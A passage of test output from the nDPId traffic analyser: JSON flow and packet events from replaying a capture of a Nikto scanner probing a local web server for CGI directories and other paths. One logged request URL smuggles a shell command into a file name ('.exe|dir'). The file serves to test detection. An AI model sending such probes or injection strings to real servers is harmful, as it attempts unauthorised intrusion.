Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1576420276692,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276692,"pkt":"AAAAAAAAAAAAAAAACABFAADEWZ5AAEAG4pN\/AAABfwAAAcG2H5D\/SmGKHR\/Uy4AYAED+uAAAAQEICp1m+vydZvr7R0VUIC8waFhDNlpVRS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1576420276694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276694,"pkt":"AAAAAAAAAAAAAAAACABFAADIBvJAAEAGNTx\/AAABfwAAAcG4H5DthT7meWwMh4AYAED+vAAAAQEICp1m+v6dZvr9R0VUIC8waFhDNlpVRS5leGV8ZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1576420276695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276695,"pkt":"AAAAAAAAAAAAAAAACABFAADCG\/NAAEAGIEF\/AAABfwAAAcG6H5DzUiPolNWjYoAYAED+tgAAAQEICp1m+v+dZvr\/R0VUIC9pbmRleC5waHA\/IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQoNCg=="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1576420276697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276697,"pkt":"AAAAAAAAAAAAAAAACABFAADEgRRAAEAGux1\/AAABfwAAAcG8H5ABRrkFDdcmsoAYAED+uAAAAQEICp1m+wGdZvsBR0VUIC9jZ2kuY2dpLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi.cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1576420276699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276699,"pkt":"AAAAAAAAAAAAAAAACABFAADDtolAAEAGhal\/AAABfwAAAcG+H5DlK46S3uw4X4AYAED+twAAAQEICp1m+wKdZvsCR0VUIC93ZWJjZ2kvIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KDQo="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1576420276701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276701,"pkt":"AAAAAAAAAAAAAAAACABFAADEOWhAAEAGAsp\/AAABfwAAAcHAH5CIUQFyvT1whIAYAED+uAAAAQEICp1m+wWdZvsFR0VUIC9jZ2ktOTE0LyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-914\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1576420276703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276703,"pkt":"AAAAAAAAAAAAAAAACABFAADEOclAAEAGAml\/AAABfwAAAcHCH5AyFgHRa7MhPoAYAED+uAAAAQEICp1m+wadZvsGR0VUIC9jZ2ktOTE1LyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-915\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1576420276704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276704,"pkt":"AAAAAAAAAAAAAAAACABFAADAObpAAEAGAnx\/AAABfwAAAcHEH5ArBQGh2qRxvoAYAED+tAAAAQEICp1m+widZvsIR0VUIC9iaW4vIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1576420276705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276705,"pkt":"AAAAAAAAAAAAAAAACABFAADARJ1AAEAG95h\/AAABfwAAAcHGH5BoLnyEpCdA\/4AYAED+tAAAAQEICp1m+wmdZvsJR0VUIC9jZ2kvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1576420276707,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276707,"pkt":"AAAAAAAAAAAAAAAACABFAADCUelAAEAG6kp\/AAABfwAAAcHIH5DIZGoAvjYJ64AYAED+tgAAAQEICp1m+wudZvsLR0VUIC9tcGNnaS8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQoNCg=="} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mpcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1576420276708,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276708,"pkt":"AAAAAAAAAAAAAAAACABFAADE7opAAEAGTad\/AAABfwAAAcHKH5CIytaS2kjlzYAYAED+uAAAAQEICp1m+wydZvsMR0VUIC9jZ2ktYmluLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 